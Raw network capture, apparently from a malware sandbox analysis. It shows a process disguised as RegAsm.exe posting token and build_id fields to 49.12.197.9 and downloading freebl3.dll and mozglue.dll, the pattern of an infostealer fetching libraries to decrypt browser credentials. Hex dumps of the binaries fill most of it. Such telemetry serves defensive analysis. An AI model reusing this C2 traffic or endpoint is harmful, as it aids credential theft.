                                                                                                                                                      Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------HJJJDAEGIDHCBFHJJJEGCont
                                                                                                                                                      2024-10-03 07:16:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:21 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      10192.168.2.64973049.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:21 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 437
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:21 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------FCAAEBFHJJDAAKFIECGDCont
                                                                                                                                                      2024-10-03 07:16:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:22 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:22 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      11192.168.2.64973149.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:23 UTC195OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:23 UTC262INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:23 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 685392
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Thursday, 03-Oct-2024 07:16:23 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-10-03 07:16:23 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                      2024-10-03 07:16:23 UTC16384INData Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f
                                                                                                                                                      Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                                                      2024-10-03 07:16:23 UTC16384INData Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8
                                                                                                                                                      Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                                                                                      2024-10-03 07:16:23 UTC16384INData Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01
                                                                                                                                                      Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                                                      2024-10-03 07:16:23 UTC16384INData Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1
                                                                                                                                                      Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                      2024-10-03 07:16:23 UTC16384INData Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f
                                                                                                                                                      Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                      2024-10-03 07:16:23 UTC16384INData Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00
                                                                                                                                                      Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                      2024-10-03 07:16:23 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                                                                                      Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                      2024-10-03 07:16:23 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
                                                                                                                                                      Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                                                      2024-10-03 07:16:23 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                                                                                      Data Ascii: ,0<48%8A)$


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      12192.168.2.64973249.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:25 UTC195OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:25 UTC262INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:25 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 608080
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Thursday, 03-Oct-2024 07:16:25 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-10-03 07:16:25 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                      2024-10-03 07:16:25 UTC16384INData Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00
                                                                                                                                                      Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                                                                      2024-10-03 07:16:25 UTC16384INData Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c
                                                                                                                                                      Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                                                                                      2024-10-03 07:16:25 UTC16384INData Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9
                                                                                                                                                      Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                                                      2024-10-03 07:16:25 UTC16384INData Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89
                                                                                                                                                      Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                                                      2024-10-03 07:16:25 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                                                                                      Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                                                      2024-10-03 07:16:25 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                                                                                      Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
